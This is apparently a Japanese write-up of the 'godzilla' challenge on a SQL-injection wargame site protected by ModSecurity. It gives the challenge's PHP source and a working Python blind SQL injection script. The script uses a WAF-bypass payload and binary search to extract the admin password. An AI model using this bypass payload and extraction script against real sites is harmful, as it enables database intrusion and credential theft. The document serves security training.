<?php include "./config.php"; login_chk(); $db = dbconnect(); if(preg_match('/prob|_|\.|\(\)/i', $_GET[id])) exit("No Hack ~_~"); if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~"); $query = "select id from prob_godzilla where id='{$_GET[id]}' and pw='{$_GET[pw]}'"; echo "<hr>query : <strong>{$query}</strong><hr><br>"; $result = @mysqli_fetch_array(mysqli_query($db,$query)); if($result['id']) echo "<h2>Hello admin</h2>"; $_GET[pw] = addslashes($_GET[pw]); $query = "select pw from prob_godzilla where id='admin' and pw='{$_GET[pw]}'"; $result = @mysqli_fetch_array(mysqli_query($db,$query)); if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("godzilla"); highlight_file(__FILE__);
特徴は以下。
- id,pwが入力可能
prob,_,.,()がフィルタリング
- 問題文に書いてあるが、ModSecurityによるWAFが導入されている
- adminのpwを抜き取る必要がある。
普通にBlind SQL Injectionできそうな感じがする。
Blind SQL Injection
今まで使ってきたWAF回避のコマンドを改造して、Blind SQL Injectionする。
import requests
url = "https://modsec.rubiya.kr/chall/godzilla_799df8.php"
cookie = {'PHPSESSID': 'eoddq5'}
def check(data) -> bool:
return ("Hello admin" in data) or ("Hello guest" in data)
ok = 0
ng = 60
while ok + 1 != ng:
md = (ok + ng) // 2
q = "-1'<@=1 OR {x (select 1)}='1' and id='admin' and " + str(md) + " <= length(pw) #"
res = requests.get(url, params={'id': q}, cookies=cookie)
print(f"[+] try {md}")
if check(res.text):
ok = md
else:
ng = md
length = ok
print(f"[*] length = {length}")
ans = ""
for i in range(0, length):
ok = 0
ng = 256
while ok + 1 != ng:
md = (ok + ng) // 2
q = "-1'<@=1 OR {x (select 1)}='1' and id='admin' and " + str(md) + " <= ascii(substr(pw," + str(i+1) + ",1)) #"
res = requests.get(url, params={'id': q}, cookies=cookie)
print(f"[+] try {md}")
if check(res.text):
ok = md
else:
ng = md
ans += str(chr(ok))
print(f"[*] {ans}")
print(f"[*] find! {ans}")
